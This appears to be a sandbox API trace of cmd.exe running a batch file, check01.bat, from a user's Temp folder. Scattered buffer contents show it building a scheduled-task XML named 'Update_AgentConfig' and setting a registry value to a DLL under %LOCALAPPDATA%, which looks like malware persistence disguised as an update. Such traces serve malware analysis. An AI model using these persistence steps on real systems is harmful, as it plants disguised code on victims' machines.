[0377.763] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0377.763] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0377.764] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x201740, Size=0x68) returned 0x201740
[0377.764] GetProcessHeap () returned 0x200000
[0377.764] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x201740) returned 0x68
[0377.764] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer="2020-06-18T10:13:32.9293139 \r\n") returned 44
[0377.764] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.764] GetFileType (hFile=0x64) returned 0x1
[0377.765] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.765] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="2020-06-18T10:13:32.9293139 \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2020-06-18T10:13:32.9293139 \r\n", lpUsedDefaultChar=0x0) returned 45
[0377.765] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x2c, lpOverlapped=0x0) returned 1
[0377.765] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0377.768] _close (_FileHandle=3) returned 0
[0377.770] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.770] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0377.771] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.771] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0377.771] _get_osfhandle (_FileHandle=0) returned 0x3
[0377.772] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0377.772] SetConsoleInputExeNameW () returned 0x1
[0377.772] GetConsoleOutputCP () returned 0x1b5
[0377.773] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0377.773] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0377.773] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.774] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0377.774] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.774] SetFilePointer (in: hFile=0x64, lDistanceToMove=701, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2bd
[0377.774] GetProcessHeap () returned 0x200000
[0377.774] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2017c0 | out: hHeap=0x200000) returned 1
[0377.774] GetProcessHeap () returned 0x200000
[0377.774] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201740 | out: hHeap=0x200000) returned 1
[0377.775] GetProcessHeap () returned 0x200000
[0377.775] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0377.775] GetProcessHeap () returned 0x200000
[0377.775] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc60 | out: hHeap=0x200000) returned 1
[0377.775] GetProcessHeap () returned 0x200000
[0377.775] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0377.775] GetProcessHeap () returned 0x200000
[0377.775] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0377.775] GetProcessHeap () returned 0x200000
[0377.775] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.775] GetProcessHeap () returned 0x200000
[0377.775] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0377.776] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.776] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2bd
[0377.776] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xc75, lpOverlapped=0x0) returned 1
[0377.776] SetFilePointer (in: hFile=0x64, lDistanceToMove=771, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x303
[0377.776] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^Update Agent Cfg^ >> %temp%\\a.xml\r\n", cbMultiByte=70, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^Update Agent Cfg^ >> %temp%\\a.xml\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 70
[0377.776] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.777] GetFileType (hFile=0x64) returned 0x1
[0377.777] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.777] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x303
[0377.777] GetProcessHeap () returned 0x200000
[0377.777] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22d3d0
[0377.777] GetProcessHeap () returned 0x200000
[0377.777] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2313f0
[0377.777] GetProcessHeap () returned 0x200000
[0377.777] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0377.777] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0377.778] GetProcessHeap () returned 0x200000
[0377.778] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.778] GetProcessHeap () returned 0x200000
[0377.778] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2313f0 | out: hHeap=0x200000) returned 1
[0377.778] GetProcessHeap () returned 0x200000
[0377.778] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22d3d0 | out: hHeap=0x200000) returned 1
[0377.779] _tell (_FileHandle=3) returned 771
[0377.779] _close (_FileHandle=3) returned 0
[0377.779] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0377.779] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0377.779] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0377.779] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0377.779] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0377.780] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0377.780] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0377.780] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0377.780] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0377.780] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0377.780] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.780] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.780] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.780] GetFileType (hFile=0x7) returned 0x2
[0377.781] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0377.781] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0377.783] _dup (_FileHandle=1) returned 3
[0377.785] _close (_FileHandle=1) returned 0
[0377.786] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0377.786] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.786] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0377.787] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.787] GetFileType (hFile=0x64) returned 0x1
[0377.787] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc0
[0377.787] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0xbf
[0377.787] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0377.787] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0377.788] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x201740, Size=0x6e) returned 0x201740
[0377.788] GetProcessHeap () returned 0x200000
[0377.788] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x201740) returned 0x6e
[0377.788] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer="Update Agent Cfg \r\n") returned 46
[0377.788] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.788] GetFileType (hFile=0x64) returned 0x1
[0377.788] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.788] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Update Agent Cfg \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Update Agent Cfg \r\n", lpUsedDefaultChar=0x0) returned 47
[0377.788] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x2e, lpOverlapped=0x0) returned 1
[0377.789] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0377.791] _close (_FileHandle=3) returned 0
[0377.792] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.792] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0377.793] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.793] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0377.793] _get_osfhandle (_FileHandle=0) returned 0x3
[0377.793] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0377.794] SetConsoleInputExeNameW () returned 0x1
[0377.794] GetConsoleOutputCP () returned 0x1b5
[0377.795] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0377.795] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0377.795] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.795] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0377.795] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.795] SetFilePointer (in: hFile=0x64, lDistanceToMove=771, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x303
[0377.795] GetProcessHeap () returned 0x200000
[0377.796] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2017c0 | out: hHeap=0x200000) returned 1
[0377.796] GetProcessHeap () returned 0x200000
[0377.796] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201740 | out: hHeap=0x200000) returned 1
[0377.796] GetProcessHeap () returned 0x200000
[0377.796] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0377.796] GetProcessHeap () returned 0x200000
[0377.796] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc70 | out: hHeap=0x200000) returned 1
[0377.796] GetProcessHeap () returned 0x200000
[0377.796] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0377.796] GetProcessHeap () returned 0x200000
[0377.797] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0377.797] GetProcessHeap () returned 0x200000
[0377.797] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.797] GetProcessHeap () returned 0x200000
[0377.797] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0377.798] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.798] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x303
[0377.798] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xc2f, lpOverlapped=0x0) returned 1
[0377.798] SetFilePointer (in: hFile=0x64, lDistanceToMove=828, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x33c
[0377.798] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^\\Update_AgentConfig^ >> %temp%\\a.xml\r\n", cbMultiByte=57, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^\\Update_AgentConfig^ >> %temp%\\a.xml\r\ntemp%\\a.xml\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 57
[0377.799] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.799] GetFileType (hFile=0x64) returned 0x1
[0377.799] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.799] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x33c
[0377.799] GetProcessHeap () returned 0x200000
[0377.799] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22d3d0
[0377.799] GetProcessHeap () returned 0x200000
[0377.799] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2313f0
[0377.799] GetProcessHeap () returned 0x200000
[0377.800] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0377.800] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0377.800] GetProcessHeap () returned 0x200000
[0377.800] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.800] GetProcessHeap () returned 0x200000
[0377.800] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2313f0 | out: hHeap=0x200000) returned 1
[0377.800] GetProcessHeap () returned 0x200000
[0377.801] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22d3d0 | out: hHeap=0x200000) returned 1
[0377.801] _tell (_FileHandle=3) returned 828
[0377.801] _close (_FileHandle=3) returned 0
[0377.801] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0377.801] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0377.801] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0377.802] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0377.802] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0377.802] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0377.802] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0377.802] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0377.802] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0377.802] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0377.802] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.802] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.802] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.802] GetFileType (hFile=0x7) returned 0x2
[0377.803] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0377.803] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0377.804] _dup (_FileHandle=1) returned 3
[0377.805] _close (_FileHandle=1) returned 0
[0377.806] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0377.806] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.806] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0377.806] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.806] GetFileType (hFile=0x64) returned 0x1
[0377.806] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xee
[0377.806] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0xed
[0377.806] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0377.807] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0377.807] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21cc60, Size=0x54) returned 0x21cc60
[0377.807] GetProcessHeap () returned 0x200000
[0377.807] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21cc60) returned 0x54
[0377.807] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer="\\Update_AgentConfig \r\n") returned 33
[0377.807] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.807] GetFileType (hFile=0x64) returned 0x1
[0377.808] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.808] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\Update_AgentConfig \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Update_AgentConfig \r\n", lpUsedDefaultChar=0x0) returned 34
[0377.808] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x21, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x21, lpOverlapped=0x0) returned 1
[0377.808] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0377.827] _close (_FileHandle=3) returned 0
[0377.828] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.828] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0377.828] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.829] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0377.829] _get_osfhandle (_FileHandle=0) returned 0x3
[0377.829] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0377.830] SetConsoleInputExeNameW () returned 0x1
[0377.830] GetConsoleOutputCP () returned 0x1b5
[0377.830] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0377.831] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0377.831] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.831] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0377.831] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.831] SetFilePointer (in: hFile=0x64, lDistanceToMove=828, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x33c
[0377.832] GetProcessHeap () returned 0x200000
[0377.832] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201740 | out: hHeap=0x200000) returned 1
[0377.832] GetProcessHeap () returned 0x200000
[0377.832] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc60 | out: hHeap=0x200000) returned 1
[0377.832] GetProcessHeap () returned 0x200000
[0377.832] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0377.832] GetProcessHeap () returned 0x200000
[0377.832] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0377.833] GetProcessHeap () returned 0x200000
[0377.833] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0377.833] GetProcessHeap () returned 0x200000
[0377.833] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x219a30 | out: hHeap=0x200000) returned 1
[0377.833] GetProcessHeap () returned 0x200000
[0377.833] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.833] GetProcessHeap () returned 0x200000
[0377.833] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0377.833] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.833] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x33c
[0377.834] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xbf6, lpOverlapped=0x0) returned 1
[0377.834] SetFilePointer (in: hFile=0x64, lDistanceToMove=872, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x368
[0377.834] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=44, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\ntemp%\\a.xml\r\ntemp%\\a.xml\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 44
[0377.834] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.834] GetFileType (hFile=0x64) returned 0x1
[0377.834] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.834] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x368
[0377.835] GetProcessHeap () returned 0x200000
[0377.835] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22d3d0
[0377.835] GetProcessHeap () returned 0x200000
[0377.835] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2313f0
[0377.835] GetProcessHeap () returned 0x200000
[0377.835] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0377.835] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0377.835] GetProcessHeap () returned 0x200000
[0377.835] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.835] GetProcessHeap () returned 0x200000
[0377.836] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2313f0 | out: hHeap=0x200000) returned 1
[0377.836] GetProcessHeap () returned 0x200000
[0377.836] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22d3d0 | out: hHeap=0x200000) returned 1
[0377.836] _tell (_FileHandle=3) returned 872
[0377.836] _close (_FileHandle=3) returned 0
[0377.837] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0377.837] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0377.837] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0377.837] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0377.837] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0377.837] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0377.837] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0377.837] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0377.837] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0377.837] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0377.838] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.838] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.838] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.838] GetFileType (hFile=0x7) returned 0x2
[0377.838] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0377.839] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0377.839] _dup (_FileHandle=1) returned 3
[0377.840] _close (_FileHandle=1) returned 0
[0377.841] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0377.841] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.841] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0377.842] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.842] GetFileType (hFile=0x64) returned 0x1
[0377.842] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10f
